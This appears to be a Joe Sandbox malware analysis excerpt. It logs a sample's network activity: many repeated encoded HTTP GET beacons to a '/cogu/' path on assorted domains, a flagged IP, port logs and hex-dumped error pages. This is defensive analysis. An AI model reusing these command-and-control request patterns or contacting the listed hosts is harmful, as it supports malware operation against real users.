/cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF HTTP/1.1Host: www.cinargeridonusum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.uprisehealthmonitoring.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.estudio-me.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.i8news-de.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.alexanderorlandis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 93.184.220.29 93.184.220.29 Source: Joe Sandbox View IP Address: 93.184.220.29 93.184.220.29
 Connects to many different domains Show sources
 Source: unknown Network traffic detected: DNS query count 39
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790 Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826 Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824 Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
 Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 708Date: Wed, 13 Oct 2021 13:48:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: 404 Not Found

404

The resource requ Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:48:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: 404 Not Found

Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.

Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:48:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: Forbidden

Access Forbidden

Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Oct 2021 13:48:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 404 Not Found